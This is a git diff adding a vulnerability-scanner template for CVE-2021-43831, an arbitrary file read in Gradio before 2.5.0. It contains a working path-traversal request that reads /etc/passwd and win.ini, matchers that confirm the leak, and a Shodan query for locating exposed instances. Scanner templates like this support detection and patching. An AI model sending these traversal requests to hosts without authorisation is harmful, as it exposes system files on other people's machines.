diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml new file mode 100644 index 0000000000..41bdceadc2 --- /dev/null +++ b/http/cves/2021/CVE-2021-43831.yaml @@ -0,0 +1,53 @@ +id: CVE-2021-43831 + +info: + name: Gradio < 2.5.0 - Arbitrary File Read + author: isacaya + severity: high + description: | + Files on the host computer can be accessed from the Gradio interface + impact: | + An attacker would be able to view the contents of a file on the computer. + remediation: | + Update to version 2.5.0. + reference: + - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhq2-3vr9-6mcr + - https://github.com/gradio-app/gradio/commit/41bd3645bdb616e1248b2167ca83636a2653f781 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.7 + cve-id: CVE-2021-43831 + cwe-id: CWE-22 + epss-score: 0.00063 + epss-percentile: 0.26511 + cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:* + metadata: + vendor: gradio_project + product: gradio + framework: python + shodan-query: title:"Gradio" + tags: cve,cve2021,lfi,gradio + +http: + - method: GET + path: + - "{{BaseURL}}/file/../../../../../../../../../../../../../../../../../..{{path}}" + + payloads: + path: + - /etc/passwd + - /windows/win.ini + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or + + - type: status + status: + - 200